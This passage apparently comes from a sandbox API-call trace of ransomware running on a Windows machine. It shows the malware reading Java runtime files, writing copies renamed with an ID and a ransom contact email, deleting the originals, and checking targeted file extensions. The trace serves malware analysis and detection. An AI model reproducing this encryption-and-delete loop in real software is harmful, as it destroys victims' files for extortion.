Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.892] lstrlenW (lpString=".dbf") returned 4 [0196.892] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0196.892] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.892] lstrlenW (lpString=".1cd") returned 4 [0196.892] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0196.892] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.892] lstrlenW (lpString=".jpg") returned 4 [0196.892] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0196.892] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.892] lstrlenW (lpString="javafx_font.dll") returned 15 [0196.892] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.893] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=69184) returned 1 [0196.893] CloseHandle (hObject=0x350) returned 1 [0196.893] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll")) returned 0x20 [0196.893] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.893] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.893] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.893] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.894] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.894] GetLastError () returned 0x0 [0196.894] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x10e40, lpOverlapped=0x0) returned 1 [0196.958] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x10e50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x10e50, lpOverlapped=0x0) returned 1 [0196.960] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.960] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xf2, lpOverlapped=0x0) returned 1 [0196.960] SetEndOfFile (hFile=0x3a0) returned 1 [0196.961] CloseHandle (hObject=0x3a0) returned 1 [0196.961] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.961] SetEndOfFile (hFile=0x350) returned 1 [0196.962] CloseHandle (hObject=0x350) returned 1 [0196.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.962] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll")) returned 1 [0196.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.963] lstrlenW (lpString=".doc") returned 4 [0196.963] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.963] lstrlenW (lpString=".docx") returned 5 [0196.963] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0196.963] lstrlenW (lpString=".pdf") returned 4 [0196.963] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.963] lstrlenW (lpString=".xls") returned 4 [0196.963] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.963] lstrlenW (lpString=".xlsx") returned 5 [0196.963] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0196.963] lstrlenW (lpString=".ppt") returned 4 [0196.963] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.963] lstrlenW (lpString=".zip") returned 4 [0196.963] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.963] lstrlenW (lpString=".rar") returned 4 [0196.963] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.963] lstrlenW (lpString=".bz2") returned 4 [0196.963] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.963] lstrlenW (lpString=".7z") returned 3 [0196.963] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.963] lstrlenW (lpString=".dbf") returned 4 [0196.963] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.964] lstrlenW (lpString=".1cd") returned 4 [0196.964] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.964] lstrlenW (lpString=".jpg") returned 4 [0196.964] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.964] lstrlenW (lpString=".doc") returned 4 [0196.964] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.964] lstrlenW (lpString=".docx") returned 5 [0196.964] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0196.964] lstrlenW (lpString=".pdf") returned 4 [0196.964] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.964] lstrlenW (lpString=".xls") returned 4 [0196.964] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.964] lstrlenW (lpString=".xlsx") returned 5 [0196.964] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0196.964] lstrlenW (lpString=".ppt") returned 4 [0196.964] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.964] lstrlenW (lpString=".zip") returned 4 [0196.964] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.964] lstrlenW (lpString=".rar") returned 4 [0196.964] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.964] lstrlenW (lpString=".bz2") returned 4 [0196.964] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.964] lstrlenW (lpString=".7z") returned 3 [0196.964] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.964] lstrlenW (lpString=".dbf") returned 4 [0196.965] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.965] lstrlenW (lpString=".1cd") returned 4 [0196.965] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll") returned 54 [0196.965] lstrlenW (lpString=".jpg") returned 4 [0196.965] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.965] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0196.965] lstrlenW (lpString="javaws.exe") returned 10 [0196.965] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.966] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=319552) returned 1 [0196.966] CloseHandle (hObject=0x350) returned 1 [0196.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe")) returned 0x20 [0196.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.966] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.966] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.966] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.966] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.967] GetLastError () returned 0x0 [0196.967] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x4e040, lpOverlapped=0x0) returned 1 [0197.204] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x4e050, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x4e050, lpOverlapped=0x0) returned 1 [0197.211] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.211] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe8, lpOverlapped=0x0) returned 1 [0197.211] SetEndOfFile (hFile=0x3a0) returned 1 [0197.212] CloseHandle (hObject=0x3a0) returned 1 [0197.212] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.212] SetEndOfFile (hFile=0x350) returned 1 [0197.215] CloseHandle (hObject=0x350) returned 1 [0197.215] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.215] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe")) returned 1 [0197.215] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.216] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.216] lstrlenW (lpString=".doc") returned 4 [0197.216] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.216] lstrlenW (lpString=".docx") returned 5 [0197.216] lstrcmpiW (lpString1=".docx", lpString2="s.exe") returned -1 [0197.216] lstrlenW (lpString=".pdf") returned 4 [0197.216] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.216] lstrlenW (lpString=".xls") returned 4 [0197.216] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.216] lstrlenW (lpString=".xlsx") returned 5 [0197.216] lstrcmpiW (lpString1=".xlsx", lpString2="s.exe") returned -1 [0197.216] lstrlenW (lpString=".ppt") returned 4 [0197.216] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.216] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.216] lstrlenW (lpString=".zip") returned 4 [0197.216] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.216] lstrlenW (lpString=".rar") returned 4 [0197.216] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.216] lstrlenW (lpString=".bz2") returned 4 [0197.216] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.216] lstrlenW (lpString=".7z") returned 3 [0197.216] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.216] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.216] lstrlenW (lpString=".dbf") returned 4 [0197.216] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.216] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.216] lstrlenW (lpString=".1cd") returned 4 [0197.216] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.216] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.216] lstrlenW (lpString=".jpg") returned 4 [0197.216] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.216] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.216] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.216] lstrlenW (lpString=".doc") returned 4 [0197.216] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.216] lstrlenW (lpString=".docx") returned 5 [0197.217] lstrcmpiW (lpString1=".docx", lpString2="s.exe") returned -1 [0197.217] lstrlenW (lpString=".pdf") returned 4 [0197.217] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.217] lstrlenW (lpString=".xls") returned 4 [0197.217] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.217] lstrlenW (lpString=".xlsx") returned 5 [0197.217] lstrcmpiW (lpString1=".xlsx", lpString2="s.exe") returned -1 [0197.217] lstrlenW (lpString=".ppt") returned 4 [0197.217] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.217] lstrlenW (lpString=".zip") returned 4 [0197.217] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.217] lstrlenW (lpString=".rar") returned 4 [0197.217] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.217] lstrlenW (lpString=".bz2") returned 4 [0197.217] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.217] lstrlenW (lpString=".7z") returned 3 [0197.217] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.217] lstrlenW (lpString=".dbf") returned 4 [0197.217] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.217] lstrlenW (lpString=".1cd") returned 4 [0197.217] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 49 [0197.217] lstrlenW (lpString=".jpg") returned 4 [0197.217] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.218] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.218] lstrlenW (lpString="JAWTAccessBridge-64.dll") returned 23 [0197.218] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.218] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=15424) returned 1 [0197.218] CloseHandle (hObject=0x350) returned 1 [0197.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll")) returned 0x20 [0197.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.219] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.219] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.219] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.219] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0197.220] GetLastError () returned 0x0 [0197.220] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x3c40, lpOverlapped=0x0) returned 1 [0197.441] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x3c50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x3c50, lpOverlapped=0x0) returned 1 [0197.442] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.443] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x102, lpOverlapped=0x0) returned 1 [0197.443] SetEndOfFile (hFile=0x3a0) returned 1 [0197.443] CloseHandle (hObject=0x3a0) returned 1 [0197.443] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.443] SetEndOfFile (hFile=0x350) returned 1 [0197.444] CloseHandle (hObject=0x350) returned 1 [0197.444] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.444] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll")) returned 1 [0197.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.445] lstrlenW (lpString=".doc") returned 4 [0197.445] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.445] lstrlenW (lpString=".docx") returned 5 [0197.445] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0197.445] lstrlenW (lpString=".pdf") returned 4 [0197.445] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.445] lstrlenW (lpString=".xls") returned 4 [0197.445] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.445] lstrlenW (lpString=".xlsx") returned 5 [0197.445] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0197.445] lstrlenW (lpString=".ppt") returned 4 [0197.445] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.445] lstrlenW (lpString=".zip") returned 4 [0197.445] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.445] lstrlenW (lpString=".rar") returned 4 [0197.445] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.445] lstrlenW (lpString=".bz2") returned 4 [0197.445] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.445] lstrlenW (lpString=".7z") returned 3 [0197.445] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.446] lstrlenW (lpString=".dbf") returned 4 [0197.446] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.446] lstrlenW (lpString=".1cd") returned 4 [0197.446] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.446] lstrlenW (lpString=".jpg") returned 4 [0197.446] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.446] lstrlenW (lpString=".doc") returned 4 [0197.446] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.446] lstrlenW (lpString=".docx") returned 5 [0197.446] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0197.446] lstrlenW (lpString=".pdf") returned 4 [0197.446] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.446] lstrlenW (lpString=".xls") returned 4 [0197.446] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.446] lstrlenW (lpString=".xlsx") returned 5 [0197.446] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0197.446] lstrlenW (lpString=".ppt") returned 4 [0197.446] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.446] lstrlenW (lpString=".zip") returned 4 [0197.446] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.446] lstrlenW (lpString=".rar") returned 4 [0197.446] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.446] lstrlenW (lpString=".bz2") returned 4 [0197.446] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.446] lstrlenW (lpString=".7z") returned 3 [0197.446] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.446] lstrlenW (lpString=".dbf") returned 4 [0197.447] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.447] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.447] lstrlenW (lpString=".1cd") returned 4 [0197.447] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.447] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 62 [0197.447] lstrlenW (lpString=".jpg") returned 4 [0197.447] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.447] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.447] lstrlenW (lpString="jp2iexp.dll") returned 11 [0197.447] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.447] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=296000) returned 1 [0197.447] CloseHandle (hObject=0x350) returned 1 [0197.448] GetFileAttributesW (lpFileName="C:\\Program 